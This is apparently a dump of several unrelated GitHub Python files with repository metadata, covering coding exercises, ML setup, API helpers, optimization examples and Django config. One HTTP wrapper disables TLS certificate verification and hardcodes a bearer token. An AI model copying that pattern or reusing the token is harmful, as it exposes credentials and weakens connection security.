9e61ca0ec884517b5bc6f4f207ccc7ecc1fab5de
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02379/s853900815.py
|
e67e21597c716cb33d750d137584d5e4bcb61215
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 99
|
py
|
x1, y1, x2, y2 = map(float, input().split())
x = x1 - x2
y = y1 - y2
h = x**2 + y**2   # squared Euclidean distance
print(h**0.5)
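# Worked example: input "0 0 3 4" gives (3**2 + 4**2) ** 0.5 = 5.0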
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
8f6c052d6d1328a08dd9f26b998438597943d538
|
74b598e062cd1c14c5961ab7067adbacd46b848a
|
/lab_ai/03.keras_create_model.py
|
13c6532f6aed18a62f2563bf6d309968e4fac18f
|
[] |
no_license
|
taeryu0627/face_mask_detector
|
21cfa86a028055181d1d3be61344d518dbccf7ec
|
f9b96f0398b1dd541b1d381c7afe76ad8c6b4fd8
|
refs/heads/main
| 2023-06-11T06:10:00.270877
| 2021-06-30T12:47:43
| 2021-06-30T12:47:43
| 355,539,670
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 113
|
py
|
# 03. keras_create_model.py
import tensorflow as tf
model = tf.keras.applications.VGG16()
print(model.summary())
|
[
"taeryu0627@naver.com"
] |
taeryu0627@naver.com
|
63f60251d95b41c910e75b02eaf6ef5add1143b6
|
14e19bcaaf917924e7bb78e4f7e6b42662ff5164
|
/fancy_month01/day14_fancy/day14_1217_note/iteration_ex.py
|
80dc7ba2bb6684345580b2348bbc1ac2b70cfb80
|
[] |
no_license
|
Lzffancy/Aid_study
|
5b3538443ca0ad1107a83ef237459b035fef70d0
|
4ba5e5045371490d68459edd1f0a94963e0295b1
|
refs/heads/master
| 2023-02-22T19:11:00.867446
| 2021-01-25T13:01:35
| 2021-01-25T13:01:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 389
|
py
|
#--------------------
list1 = [1, 2, 3]
for each in list1:
    print(each)
#--------------------
dict1 = {1: 11, 2: 22, 3: 33}
iterator_dict1 = dict1.__iter__()  # build an iterator; the dict is the iterable
while True:
    try:
        key = iterator_dict1.__next__()  # draw the next key from the iterator
        value = dict1[key]
        print(key, value)
    except StopIteration:
        break
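# The explicit __iter__/__next__/StopIteration loop above is exactly what a
# for statement does behind the scenes; the idiomatic equivalent is:
#     for key in dict1:
#         print(key, dict1[key])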
|
[
"731566721@qq.com"
] |
731566721@qq.com
|
0d12a4366c4ffdf0246d89a69acbbd0677ced682
|
603233844767fa25ee4d66697623174bd794a01b
|
/uc2_metric_generator.py
|
19c00aa099878acd4f337c33bc5c32e6e09384a6
|
[
"MIT"
] |
permissive
|
5g-media/cno-rl
|
3479507ebcba1e78167b05f924e45ba371a61cfd
|
264def52bfd25ca89209ad04a908c3c599dcca02
|
refs/heads/master
| 2022-04-20T14:19:16.532485
| 2020-04-15T10:41:06
| 2020-04-15T22:21:35
| 255,919,817
| 0
| 0
|
MIT
| 2020-04-15T21:59:34
| 2020-04-15T13:08:11
| null |
UTF-8
|
Python
| false
| false
| 1,882
|
py
|
from uc2_settings import METRIC_TEMPLATE, METRIC_TEMPLATE_UC2_EXEC, METRIC_TEMPLATE_UC2_CONF
def generate_metric_uc2_exec(metric_value, timestamp, tmp, vce_id):
#metric = METRIC_TEMPLATE_UC2_EXEC
metric = tmp
metric['execution']['value'] = metric_value
metric['execution']['mac'] = vce_id
#metric['metric']['timestamp'] = timestamp
return metric
def generate_metric_uc2_conf(metric_value, timestamp, tmp, vce_id):
metric_bitrate = {"bitrate": metric_value}
#metric = METRIC_TEMPLATE_UC2_CONF
metric = tmp
metric['vce']['mac'] = vce_id
metric['vce']['action'] = metric_bitrate
#metric['vce']['timestamp'] = timestamp
return metric
def generate_metric_uc2_tm(bw, tp, metric_tmp, metric_type, unit):
metric = metric_tmp
metric['unit'] = str(unit)
metric['vdu_uuid'] = 677
metric['value'] = bw
metric['type'] = str(metric_type)
metric['timestamp'] = tp
return metric
def generate_metric_uc2_vce(metric_value, timestamp, tmp, vce_id, video_bit_rates, profile):
metric = tmp
metric['id'] = vce_id #str
metric['utc_time'] = timestamp #int
metric['metric_x'] = video_bit_rates[int(metric_value[2])] #int
metric['metric_y'] = video_bit_rates[int(metric_value[3])] #int
metric['metric_z'] = profile
return metric
def generate_metric_uc2_cno(bandwidth, timestamp, tmp_metric, msg_type):
metric = tmp_metric
if (msg_type == "request"):
metric['sender'] = "UC_2"
metric['receiver'] = "O-CNO"
metric['timestamp'] = timestamp
metric['resource']['bw'] = bandwidth
metric['option'] = msg_type
elif (msg_type == "respond"):
metric['sender'] = "O-CNO"
metric['receiver'] = "UC_2"
metric['timestamp'] = timestamp
metric['resource']['bw'] = bandwidth
metric['option'] = msg_type
return metric
|
[
"m.kheirkhah@ucl.ac.uk"
] |
m.kheirkhah@ucl.ac.uk
|
9191c8485a0c9f112d79fc9f561e94b5c35a6caa
|
df264c442075e04bb09d82f9be1d915c070d7e09
|
/BJ/G4_15685_20210406.py
|
79e6ef62c989c5e56453a2dda3a95caa383459a1
|
[] |
no_license
|
Koozzi/Algorithms
|
ff7a73726f18e87cab9406e7b71cd5d1856df183
|
38048ac0774fcab3537bdd64f48cae7d9eb71e6f
|
refs/heads/master
| 2021-07-06T04:59:38.564772
| 2021-05-03T08:49:56
| 2021-05-03T08:49:56
| 231,848,463
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,213
|
py
|
'''
start  00:00
submit 00:56
end
'''
from copy import deepcopy
def get_next_location(I, J, last_i, last_j):
    # rotate the point (I, J) by 90 degrees about the previous end point (last_i, last_j)
    sub_i = I - last_i
    sub_j = J - last_j
    next_i = last_i + sub_j
    next_j = last_j - sub_i
    return next_i, next_j
def make_dragon_curve(dragon_curve):
next_dragon_curve = deepcopy(dragon_curve)
last_i, last_j = dragon_curve[-1]
init_length = len(next_dragon_curve)
for idx in range(init_length-2, -1, -1):
I, J = next_dragon_curve[idx]
next_i, next_j = get_next_location(I,J,last_i,last_j)
next_dragon_curve.append([next_i, next_j])
return next_dragon_curve
board = [[False for _ in range(101)] for _ in range(101)]
move = [[0,1],[-1,0],[0,-1],[1,0]]
N = int(input())
for _ in range(N):
J,I,D,S = map(int, input().split())
dragon_curve = [[I,J],[I+move[D][0], J+move[D][1]]]
for _ in range(S):
dragon_curve = make_dragon_curve(dragon_curve)
for dragon_i, dragon_j in dragon_curve:
board[dragon_i][dragon_j] = True
answer = 0
for i in range(100):
for j in range(100):
if board[i][j] and board[i][j+1] and board[i+1][j] and board[i+1][j+1]:
answer += 1
print(answer)
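# Hedged sanity check (not part of the original solution):
# get_next_location(0, 1, 0, 0) returns (1, 0), i.e. the point (0, 1) rotated
# 90 degrees about the origin while keeping its distance, which is the step
# each generation of the dragon curve applies to every existing point.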
|
[
"koozzi666@gmail.com"
] |
koozzi666@gmail.com
|
d3ef6138de3e96f29127428c55728e1dbcddf131
|
cc02568e29d86674a0e8746a4dccb49f94933f15
|
/sbis.py
|
419e8bb2e8d31bb902784a41d95cc2eb13f1bc78
|
[] |
no_license
|
quicksilver32/rivals_finder_test
|
8f44fc97bfb5ecef2dce1907934b11c91e0e6270
|
863c50d1eaf49e53601904c08db703c91af85531
|
refs/heads/master
| 2020-04-08T23:47:02.205603
| 2018-12-01T15:04:31
| 2018-12-01T15:04:31
| 159,840,030
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,185
|
py
|
#!/usr/bin/python3
# coding=utf-8
import codecs
import pprint
import requests
import sys
sys.stdout = codecs.getwriter("utf-8")(sys.stdout.detach())
log = pprint.PrettyPrinter(indent=4)
base_url = 'fix-online.sbis.ru'
session = requests.Session()
user_id = ""
def rpc(service, method, params):
global base_url
if "http:" in service or "https:" in service:
url = service
else:
url = "https://" + base_url + "/" + service + "/"
headers = {"Content-Type": "application/json; charset=utf-8", "Accept": "application/json"}
body = {"jsonrpc": "2.0", "protocol": 4, "method": method, "params": params}
sys.stdout.flush()
raw = session.post(url, headers=headers, json=body)
response = raw.json()
result = response.get("result")
if result is None:
print("\n-- {} on {} failed --".format(method, base_url))
log.pprint(response)
sys.stdout.flush()
        raise RuntimeError(response)  # a plain dict cannot be raised directly
return result
def rpc_return_record(service, method, params):
return parse_record(rpc(service, method, params))
def rpc_return_recordset(service, method, params):
return parse_recordset(rpc(service, method, params))
def login(url, user, password):
global base_url
base_url = url
rpc("auth/service", "САП.АутентифицироватьРасш", {"login": user, "password": password})
user_info = rpc_return_record("service", "Пользователь.GetCurrentUserInfo", {})
global user_id
user_id = str(user_info['ИдентификаторПользователя'])
# log.pprint(user_info)
# for c in session.cookies:
# log.pprint(f'{c.name}={c.value}')
def schema_type(s):
return {
'int': 'Число целое',
'int[]': {'n': "Массив", 't': "Число целое"},
'string': 'Строка',
'bool': 'Логическое',
'uuid': 'UUID',
'date-time': 'Дата и время',
'date': 'Дата',
'time': 'Время'
}[s]
def schema_field(s):
(n, t) = s.split(':')
return {'n': n, 't': schema_type(t)}
def schema(s):
return list(map(lambda f: schema_field(f), s.split(' ')))
def record(s, d):
return {'s': schema(s), 'd': d}
def recordset(s, d):
return {'s': schema(s), 'd': d}
def navigation(page, page_size, has_more):
return record('Страница:int РазмерСтраницы:int ЕстьЕще:bool', [page, page_size, has_more])
def field_type(t):
if type(t) is str:
return {
'Число целое': 'int',
'Текст': 'string',
'Строка': 'string',
'Логическое': 'bool',
'UUID': 'uuid',
'Дата и время': 'date-time',
'Дата': 'date',
'Время': 'time',
'Запись': 'record',
'Выборка': 'recordset',
'Идентификатор': 'int'
}[t]
if type(t) is dict and t['n'] == 'Массив':
return field_type(t['t']) + ' array'
return str(t)
def print_uni(record_or_recordset, indent):
s = record_or_recordset['s']
data = record_or_recordset['d']
_type = record_or_recordset['_type']
for field_index in sorted([[x, i] for i, x in enumerate(s)], key=lambda x: x[0]['n']):
field = field_index[0]
index = field_index[1]
type_name = field_type(field['t'])
print(indent + field['n'] + ' ' + type_name)
if type_name == 'record' or type_name == 'recordset':
if _type == 'record':
sample = data[index]
if sample:
print_uni(sample, indent + '\t')
else:
for r in data:
sample = r[index]
if sample:
print_uni(sample, indent + '\t')
break
def parse_schema(record_or_recordset):
names = []
for s in record_or_recordset['s']:
names.append(s['n'])
return names
def parse_data(names, d):
item = {}
i = 0
for n in names:
v = d[i]
if isinstance(v, dict):
if v['_type'] == 'record':
v = parse_record(v)
elif v['_type'] == 'recordset':
v = parse_recordset(v)
item[n] = v
i += 1
return item
def parse_recordset(rs):
names = parse_schema(rs)
items = []
for d in rs['d']:
items.append(parse_data(names, d))
return items
def parse_record(r):
return parse_data(parse_schema(r), r['d'])
def parse_record_or_recordset(r):
if r['_type'] == 'record':
return parse_record(r)
else:
return parse_recordset(r)
|
[
"ameliya9@mail.ru"
] |
ameliya9@mail.ru
|
18cee653080385d873c821f33b86e5137a1d2c2e
|
3a2b9a75c47cae05d974ec06d75f621decfeefdd
|
/base/runmethod.py
|
14caac28bd5f44cf1d997e0a39c1b9ff3776a482
|
[] |
no_license
|
fan1992619/at_api
|
d72fc3344eeb7a15f950387a6009e4c7273e6059
|
6e61eb336523d1d59609a4d147744508c3f48729
|
refs/heads/master
| 2021-07-07T19:14:29.125202
| 2020-06-07T13:38:09
| 2020-06-07T13:38:09
| 152,037,744
| 0
| 1
| null | 2020-07-21T09:40:43
| 2018-10-08T07:37:59
|
Python
|
UTF-8
|
Python
| false
| false
| 3,318
|
py
|
# coding:utf-8
import requests
import json
import time
# import the following to suppress SSL-certificate warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# verify=False ignores the SSL errors that HTTPS would otherwise raise
import random
class RunMethod:
    # define a POST helper
def post_main(self,url,header=None,data=None):
res = None
if header !=None:
try:
res = requests.post(url=url,data=data,headers=header,verify=False).json()
if res['code']==-204:
                    # the article reached its publish limit, or this is a duplicate submission
                    print("duplicate submission, false")
res=self.delete_main(url,header,data)
elif res['code']==-201:
                    # this article has already been liked
time.sleep(3)
res=self.delete_main(url,header,data)
res=requests.post(url=url,data=data,headers=header,verify=False).json()
elif res['code']==-2:
                    # no permission to modify others' info, message already marked read, or malformed data
pass
except:
res = requests.post(url=url, data=data, headers=header, verify=False)
res=res.status_code
else:
res = requests.post(url=url,data=data,verify=False).json()
time.sleep(2)
return json.dumps(res)
    # define a GET helper
def get_main(self,url,header=None,data=None):
res = None
if header !=None:
try:
res = requests.get(url=url, data=data, headers=header, verify=False).json()
except:
res=requests.get(url=url, data=data, headers=header, verify=False)
res=res.status_code
else:
try:
res = requests.get(url=url, data=data, verify=False).json()
# if res['accessid']:
                # # handle the OSS signing endpoint
# time.sleep(3)
# res=requests.get(url=url, data=data, verify=False)
# res=res.status_code
# elif res['code']:
# pass
except:
res = requests.get(url=url, data=data, verify=False)
res = res.status_code
return json.dumps(res)
    # define a DELETE helper
def delete_main(self,url,header=None,data=None):
res=None
res=requests.delete(url=url,data=data,headers=header,verify=False).json()
if res['code']!=0:
            res=self.post_main(url,header,data)  # reordered: post_main expects (url, header, data)
res=requests.delete(url=url,data=data,headers=header,verify=False).json()
return json.dumps(res)
def run_main(self,method,url,header=None,data=None):
res = None
if method == 'post':
res = self.post_main(url,header,data)
elif method=='delete':
res=self.delete_main(url,header,data)
else:
res = self.get_main(url,header,data)
# return json.dumps(res,ensure_ascii=False)
return res
if __name__ == '__main__':
run=RunMethod()
header={
'Host': 'api.at.top',
'Connection': 'Keep-Alive',
'Accept-Encoding': 'gzip',
'User-Agent': 'okhttp/3.8.1',
'Authorization': 'Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvYXBpLmF0LnRvcFwvdjFcL2FjY291bnRcL3NpZ25pbiIsImlhdCI6MTU0MjcxMDM2MywiZXhwIjoxNTc0MjQ2MzYzLCJuYmYiOjE1NDI3MTAzNjMsImp0aSI6Ijk4ZUtCb2gzaEV1SUE1ckgiLCJzdWIiOiIzMSIsInBydiI6ImM4ZWUxZmM4OWU3NzVlYzRjNzM4NjY3ZTViZTE3YTU5MGI2ZDQwZmMifQ.Ey2Ot4nRgH_fV8Q7D42aKoXH2NzzPYja6bedpBqaXI4',
'deviceid': 'ac:c1:ee:c0:33:34-ac:c1:ee:c0:33:34',
'getuiclientid': '5b9a0d6f110d2b136f9ca135d93fad06',
'platform': 'android',
'userid': '33',
'version': '2.1.0'
}
data={}
url='https://api.at.top/v1/public/parameters'
print(run.run_main('get',url))
|
[
"fan1992619@163.com"
] |
fan1992619@163.com
|
b084b8900fb016f4b9475e88b75aad0b9b39e8ab
|
1be46b1c0570bfbafdabfc362f9f8be8a98e2640
|
/POO/ToDo_v3.py
|
bcd9b8451b23d98ffec6c9be5c39fd3cccea6678
|
[] |
no_license
|
beaapaixao/praticas_em_python
|
8c9387cbb6b97fb52577d101e03181545190a568
|
ca82cb12bf048dd7a501beeb09c6efd0ffc67567
|
refs/heads/master
| 2022-11-04T07:18:12.779415
| 2020-06-18T22:33:32
| 2020-06-18T22:33:32
| 257,736,346
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,611
|
py
|
from datetime import datetime
class Projeto:
def __init__(self, nome):
self.nome = nome
self.tarefas = []
def __iter__(self):
return self.tarefas.__iter__()
def add(self, descricao):
self.tarefas.append(Tarefa(descricao))
def pendentes(self):
return [tarefa for tarefa in self.tarefas if not tarefa.feito]
def procurar(self, descricao):
        # may raise IndexError if no task matches the description
return [tarefa for tarefa in self.tarefas
if tarefa.descricao == descricao][0]
def __str__(self):
return f'{self.nome} ({len(self.pendentes())} tarefa(s) pendente(s))'
class Tarefa:
def __init__(self, descricao):
self.descricao = descricao
self.feito = False
self.criacao = datetime.now()
def concluir(self):
self.feito = True
def __str__(self):
return self.descricao + ((' Concluído') if self.feito else "")
def main():
casa = Projeto('Tarefas de casa')
casa.add('Passar roupa')
casa.add('Lavar roupa')
print(casa)
casa.procurar('Lavar roupa').concluir()
    # now plain "for tarefa in casa" works, because __iter__ is defined
for tarefa in casa:
print(f'-{tarefa}')
print(casa)
mercado = Projeto('Compras no mercado')
mercado.add('Frutas')
mercado.add('Carne')
mercado.add('Tomate')
print(mercado)
comprar_carne = mercado.procurar('Carne')
comprar_carne.concluir()
    # now plain "for tarefa in mercado" works, because __iter__ is defined
for tarefa in mercado:
print(f'-{tarefa}')
print(mercado)
if __name__ == '__main__':
main()
|
[
"brendacefet@gmail.com"
] |
brendacefet@gmail.com
|
ccd69ec56c7da165b6fa0449b4e44b9a44fd4bcd
|
f8ded08c57af4a3726a791b094b38970cbb921e9
|
/examples/lattice_example06.py
|
34a47cddce14dd764f333c1d5385f93406f71716
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
mrakitin/mystic
|
ebeb837b8535ebb2a323519b900cb69e1bbb8a2d
|
6c269510fd9068d157554eaef99bc1a546b54a59
|
refs/heads/master
| 2020-12-30T16:39:55.072424
| 2017-05-10T18:40:44
| 2017-05-10T18:40:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,124
|
py
|
#!/usr/bin/env python
#
# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)
# Copyright (c) 1997-2016 California Institute of Technology.
# Copyright (c) 2016-2017 The Uncertainty Quantification Foundation.
# License: 3-clause BSD. The full license text is available at:
# - http://trac.mystic.cacr.caltech.edu/project/mystic/browser/mystic/LICENSE
"""
Example:
- Solve 8th-order Chebyshev polynomial coefficients with Powell's method.
- Uses LatticeSolver to provide 'pseudo-global' optimization
- Plot of fitting to Chebyshev polynomial.
Demonstrates:
- standard models
- minimal solver interface
"""
# the Lattice solver
from mystic.solvers import LatticeSolver
# Powell's Directional solver
from mystic.solvers import PowellDirectionalSolver
# Chebyshev polynomial and cost function
from mystic.models.poly import chebyshev8, chebyshev8cost
from mystic.models.poly import chebyshev8coeffs
# if available, use a pathos worker pool
try:
from pathos.pools import ProcessPool as Pool
#from pathos.pools import ParallelPool as Pool
except ImportError:
from mystic.pools import SerialPool as Pool
# tools
from mystic.termination import NormalizedChangeOverGeneration as NCOG
from mystic.math import poly1d
from mystic.monitors import VerboseMonitor
from mystic.tools import getch
import pylab
pylab.ion()
# draw the plot
def plot_exact():
pylab.title("fitting 8th-order Chebyshev polynomial coefficients")
pylab.xlabel("x")
pylab.ylabel("f(x)")
import numpy
x = numpy.arange(-1.2, 1.2001, 0.01)
exact = chebyshev8(x)
pylab.plot(x,exact,'b-')
pylab.legend(["Exact"])
pylab.axis([-1.4,1.4,-2,8],'k-')
pylab.draw()
return
# plot the polynomial
def plot_solution(params,style='y-'):
import numpy
x = numpy.arange(-1.2, 1.2001, 0.01)
f = poly1d(params)
y = f(x)
pylab.plot(x,y,style)
pylab.legend(["Exact","Fitted"])
pylab.axis([-1.4,1.4,-2,8],'k-')
pylab.draw()
return
if __name__ == '__main__':
from pathos.helpers import freeze_support
freeze_support() # help Windows use multiprocessing
print "Powell's Method"
print "==============="
# dimensional information
from mystic.tools import random_seed
random_seed(123)
ndim = 9
nbins = 8 #[2,1,2,1,2,1,2,1,1]
# draw frame and exact coefficients
plot_exact()
# configure monitor
stepmon = VerboseMonitor(1)
# use lattice-Powell to solve 8th-order Chebyshev coefficients
solver = LatticeSolver(ndim, nbins)
solver.SetNestedSolver(PowellDirectionalSolver)
solver.SetMapper(Pool().map)
solver.SetGenerationMonitor(stepmon)
solver.SetStrictRanges(min=[-300]*ndim, max=[300]*ndim)
solver.Solve(chebyshev8cost, NCOG(1e-4), disp=1)
solution = solver.Solution()
# use pretty print for polynomials
print poly1d(solution)
# compare solution with actual 8th-order Chebyshev coefficients
print "\nActual Coefficients:\n %s\n" % poly1d(chebyshev8coeffs)
# plot solution versus exact coefficients
plot_solution(solution)
getch()
# end of file
|
[
"mmckerns@968178ea-60bd-409e-af13-df8a517b6005"
] |
mmckerns@968178ea-60bd-409e-af13-df8a517b6005
|
f7aaea171c226e956f45fd71047404ac7c38ce8d
|
39af46b443873ed96809a46a6e15a221955cf0c7
|
/args.py
|
4bf00ee1e2377ade44158d39b2a2071ca22ef6bb
|
[] |
no_license
|
clementbeaulieu/DeepSets
|
61c786243d3527a90dc473984cd28464a4baf1ed
|
b26c97aad5b03267a61fb9ad2734f1ac407393f1
|
refs/heads/master
| 2022-11-11T17:06:00.831367
| 2020-07-06T20:23:16
| 2020-07-06T20:23:16
| 268,858,766
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,957
|
py
|
import sys
import argparse
import torch
def parse_args():
parser = argparse.ArgumentParser(description='')
    # experiment settings
# name of the experiment
parser.add_argument('--name', default='digitsum', type=str, help='name of experiment')
parser.add_argument('--train-type', default='regression', type=str, help='type of learning task (regression, classification or unsupervised)')
parser.add_argument('--val-type', default='regression', type=str, help='type of validation task (regression, classification, unsupervised or customed)')
parser.add_argument('--test-type', default='regression', type=str, help='type of test task (regression, classification, unsupervised or customed)')
parser.add_argument('--print-freq-train', type=int, default=10, help='print freq of batch values on training')
parser.add_argument('--print-freq-val', type=int, default=10, help='print freq of batch values on training')
# name of the dataset used in the experiment
parser.add_argument('--dataset', default='digitsum_image', type=str, help='name of dataset to train upon')
parser.add_argument('--test', dest='test', action='store_true', default=False, help='To run inference on test set.')
# main folder for data storage
parser.add_argument('--root-dir', type=str, default=None)
# model settings
parser.add_argument('--arch', type=str, default='digitsum_image', help='name of the architecture to be used')
parser.add_argument('--model-name', type=str, default='digitsum_image50', help='name of the model to be used')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='which checkpoint to resume from. possible values["latest", "best", epoch]')
# params for digitsum image experiment
parser.add_argument('--min-size-train', type=int, default = 2, help='min size for train set sizes')
parser.add_argument('--max-size-train', type=int, default = 10, help='max size for train set sizes')
parser.add_argument('--min-size-val', type=int, default = 5, help='min size validation/test for set sizes')
parser.add_argument('--max-size-val', type=int, default = 50, help='max size validation/test for set sizes')
parser.add_argument('--dataset-size-train', type=int, default = 100000, help='size of the train dataset of sets')
parser.add_argument('--dataset-size-val', type=int, default = 10000, help='size of the validation/test dataset of sets')
parser.add_argument('--set-weight', type=str, default='mean', help='default set_weight metrics for set_MAP score (mean, linear or exp)')
# params for classification tasks
parser.add_argument('--num-classes', default=0, type=int)
# number of workers for the dataloader
parser.add_argument('-j', '--workers', type=int, default=4)
# training settings
parser.add_argument('--start-epoch', type=int, default=1)
parser.add_argument('--step', type=int, default=20, help='frequency of updating learning rate')
parser.add_argument('--batch-size', type=int, default=64, metavar='N', help='input batch size for training (default: 64)')
    parser.add_argument('--epochs', type=int, default=100, metavar='N', help='number of epochs to train (default: 100)')
parser.add_argument('--optimizer', default='adam', type=str, help='name of the optimizer')
parser.add_argument('--scheduler', default='StepLR', type=str, help='name of the learning rate scheduler')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR', help='learning rate (default: 0.01)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M', help='sgd momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float, metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('--lr-decay', default=0.995, type=float, metavar='lrd', help='learning rate decay (default: 0.995)')
parser.add_argument('--criterion', default='mse', type=str, help='criterion to optimize')
# misc settings
parser.add_argument('--seed', type=int, default=42, metavar='S', help='random seed (default: 42)')
parser.add_argument('--disable-cuda', action='store_true', default=False, help='disables CUDA training / using only CPU')
parser.add_argument('--tensorboard', dest='tensorboard', action='store_true',default=False, help='Use tensorboard to track and plot')
args = parser.parse_args()
# update args
args.data_dir = '{}/{}'.format(args.root_dir, args.dataset)
args.log_dir = '{}/runs/{}/'.format(args.data_dir, args.name)
#args.res_dir = '%s/runs/%s/res' % (args.data_dir, args.name)
args.out_pred_dir = '%s/runs/%s/pred' % (args.data_dir, args.name)
args.cuda = not args.disable_cuda and torch.cuda.is_available()
args.device = 'cuda' if args.cuda else 'cpu'
assert args.data_dir is not None
print(' '.join(sys.argv))
print(args)
return args
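# Hedged usage sketch (not part of the original file): parse_args() reads
# sys.argv, so a training script (entry-point name assumed) would run e.g.
#   python train.py --root-dir ./data --dataset digitsum_image --epochs 100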
|
[
"clement.beaulieu@polytechnique.edu"
] |
clement.beaulieu@polytechnique.edu
|
bb8be5e76279953821643710c6b9aef108f9a32e
|
04935a87faa632ad8b588d3e8c8e84f1e1359349
|
/backend/l11n/admin.py
|
7ccc3c868ed44c825efa968ae34baaae94b79b6c
|
[
"BSD-3-Clause"
] |
permissive
|
tughi/localizappion
|
9d80473e838c551148e03c3b030f24bb8030e805
|
5c963dc8f7262cdb411cfbcc29ab4fac8fffc6c8
|
refs/heads/master
| 2021-01-18T20:32:30.364400
| 2018-06-06T21:39:00
| 2018-06-06T21:39:00
| 86,977,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 446
|
py
|
from django.contrib import admin
from .models import Project
from .models import Session
from .models import String
from .models import Suggestion
from .models import Translation
from .models import Translator
from .models import Vote
admin.site.register(Project)
admin.site.register(Session)
admin.site.register(String)
admin.site.register(Suggestion)
admin.site.register(Translation)
admin.site.register(Translator)
admin.site.register(Vote)
|
[
"admin@tughi.com"
] |
admin@tughi.com
|
844148e71e068c7822a323420d0c8c3b7e3f55a6
|
72c34626845057e150fb2f808813ba2d440aafb4
|
/Market_place/main/urls.py
|
f9840a82512132e4fad059d28745b78f1e9293bc
|
[] |
no_license
|
IgorSulj/Market_place
|
b15a82db28b937b966cf149ebe100540e2f9b0c2
|
2eb0a864e6d8e18a57974cc717661f7711d32607
|
refs/heads/master
| 2023-03-05T22:13:24.563308
| 2021-02-21T18:36:54
| 2021-02-21T18:36:54
| 340,967,480
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 148
|
py
|
from django.urls import path, include
from .views import start_page
app_name = 'main'
urlpatterns = [
    path('', start_page, name='start_page'),
]
|
[
"igorsuljin@gmail.com"
] |
igorsuljin@gmail.com
|
c404f0baaf3f4d8216168f863d039b1e9416ecd8
|
2b9765b1af64e52e16e1a4743595acb60276cd1a
|
/3_experiment/3_3_data_analysis_md/Python/jupyter/utils_exG.py
|
2e08803ab9ebdf98525cb3a56b07fe3d59b1b134
|
[] |
no_license
|
danieljwilson/MADE
|
af82814d2bdde6671279c781cefccec3ee119f96
|
9337ad740205cc9c8a2e73f7ad45bf9cc96e5193
|
refs/heads/master
| 2021-07-13T03:27:28.612081
| 2020-07-10T12:44:33
| 2020-07-10T12:44:33
| 170,940,265
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,002
|
py
|
#!/usr/bin/python
"""
util.py
Author: Daniel J Wilson, daniel.j.wilson@gmail.com
Date: April 20, 2018
Utility functions for creating fixation distributions using ExGUtils.
Note: Runs on Python 2
https://pypi.org/project/ExGUtils/
"""
import numpy as np
import pandas as pd
import os
import pickle # for saving to pickle
import glob
# ExGUtils Imports
from ExGUtils.pyexg import stats, drand, exp_rvs, gauss_rvs, exg_rvs
from ExGUtils.pyexg import *
def create_subject_dwell_samples(number, fixations_file, output_filepath):
"""
Function Description
"""
#-------------------------#
# Import fixation data #
#-------------------------#
fixations = pd.read_csv(fixations_file)
#-------------------------#
# Clean data #
#-------------------------#
# Cleaned fixations of less than 100ms
fixations_cleaned = fixations[fixations.fix_time > 100]
# Indicate percentage of removed fixations
removed = ((float(len(fixations)) - float(len(fixations_cleaned)))/float(len(fixations))) * 100
print('Cleaning fixation values below 100 ms removed {0}% of all fixations.\n'.format(round(removed, 2)))
#------------------------------#
# Create First/Mid Fix Dists. #
# for Group and Indiv. #
#------------------------------#
# GROUP
group_first_fix = fixations['fix_time'][fixations['fix_num']==1]
group_mid_fix = fixations['fix_time'][(fixations['fix_num']>1) & (fixations['rev_fix_num']>1)]
# INDIVIDUAL
subj_first_fix = {}
subj_mid_fix = {}
for i in np.unique(fixations.parcode):
subj_first_fix[i] = fixations['fix_time'][(fixations['fix_num']==1) & (fixations['parcode']==i)]
subj_mid_fix[i] = fixations['fix_time'][(fixations['fix_num']>1) & (fixations['rev_fix_num']>1) & (fixations['parcode']==i)]
#------------------------------#
# Create fixation dists. #
# based on indiv. params. #
#------------------------------#
N = number
subj_first_fix_synth = {}
subj_mid_fix_synth = {}
print('Creating subject fixation distributions...')
for i in np.unique(fixations.parcode):
x_first = subj_first_fix[i].values.tolist()
x_mid = subj_mid_fix[i].values.tolist()
[mlk_f, slk_f, tlk_f] =maxLKHD(x_first)
[mlk_m, slk_m, tlk_m] =maxLKHD(x_mid)
subj_first_fix_synth[i] = [exg_rvs(mlk_f, slk_f, tlk_f) for ii in xrange(N)]
subj_mid_fix_synth[i] = [exg_rvs(mlk_m, slk_m , tlk_m) for ii in xrange(N)]
print('{0}...'.format(i))
#------------------------------#
# Save distributions file #
#------------------------------#
if not os.path.exists(output_filepath): # create the directory if it does not already exist
os.makedirs(output_filepath)
pickle_out = open(output_filepath + "subj_first_fix_synth.pickle","wb")
pickle.dump(subj_first_fix_synth, pickle_out)
pickle_out.close()
pickle_out = open(output_filepath + "subj_mid_fix_synth.pickle","wb")
pickle.dump(subj_mid_fix_synth, pickle_out)
pickle_out.close()
|
[
"daniel.j.wilson@gmail.com"
] |
